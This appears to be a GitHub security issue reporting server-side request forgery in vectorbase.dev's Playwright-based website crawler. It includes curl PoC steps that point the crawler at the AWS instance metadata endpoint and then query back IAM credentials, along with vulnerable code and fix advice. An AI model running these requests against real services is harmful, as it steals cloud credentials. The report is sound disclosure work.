Website crawler SSRF — Playwright fetches internal URLs with no IP allowlist

Severity : High
CVSS     : 8.6 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N)
Endpoint : https://vectorbase.dev/api/sources/create
           https://vectorbase.dev/api/v1/sources (POST)


Website crawler SSRF — Playwright fetches internal URLs with no IP allowlist
-----------------------------------------------------------------------------

Summary
-------
The website source crawler in `src/lib/crawler.ts` uses Playwright to fetch any user-supplied URL and stores the resulting content as searchable chunks. It does not validate that the target URL resolves to a public IP address, enabling any authenticated API key holder to direct the crawler to internal services such as the cloud provider's instance metadata endpoint, then retrieve the exfiltrated content via the query API.

Steps / PoC
-----------
1. Create an API key via the dashboard (requires a working account; note auth is currently broken due to Supabase misconfiguration — this PoC describes the attack once auth is restored or if tested on a self-hosted instance with a valid account).

2. Create a website source pointing to the AWS IMDS:

```
curl -s -X POST https://vectorbase.dev/api/sources/create \
  -H "Authorization: Bearer <vb_sk_...>" \
  -H "Content-Type: application/json" \
  -d '{
    "projectId": "<project-uuid>",
    "type": "website",
    "name": "Internal",
    "url": "http://169.254.169.254/latest/meta-data/"
  }'
```

Expected: source created with processing triggered. The Playwright crawler fetches `[http://169.254.169.254/latest/meta-data/`](http://169.254.169.254/latest/meta-data/) and stores the response (EC2 metadata, IAM credentials, etc.) as embedding chunks.

3. Retrieve the exfiltrated content:

```
curl -s -X POST https://vectorbase.dev/api/v1/query \
  -H "Authorization: Bearer <vb_sk_...>" \
  -H "Content-Type: application/json" \
  -d '{"query": "iam credentials role", "projectId": "<project-uuid>"}'
```

Expected: response includes the IMDS content (IAM role name, access key ID, secret, token).

4. Root cause in `src/lib/crawler.ts`:

```typescript
const browser = await chromium.launch()
const page = await browser.newPage()
await page.goto(url, { timeout: 30000, waitUntil: 'domcontentloaded' })
// No IP range check before or after DNS resolution
```

The crawler sets `ignoreHTTPSErrors: true`, follows redirects, and has no allowlist filtering on the resolved destination IP. The `shouldCrawl` helper only filters by file extension and a short hardcoded path list — it does not block RFC 1918 or link-local addresses. The sitemap parser (`src/lib/sitemap-parser.ts`) has the same gap.

Impact
------
An API key holder can read the cloud instance metadata endpoint (IAM credentials, user-data scripts), internal HTTP services, and any address reachable from the deployment network, then query the stored chunks to extract the captured content.

Fix
---
1. Resolve each URL's destination IP before Playwright fetches it; block RFC 1918 (10/8, 172.16/12, 192.168/16), link-local (169.254/16), loopback (127/8), and the DNS name `*.internal`.
2. Re-validate the resolved IP after any redirect, as Playwright follows redirects natively.
3. Consider a separate egress-restricted network sandbox for the crawler process.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Website crawler SSRF — Playwright fetches internal URLs with no IP allowlist #3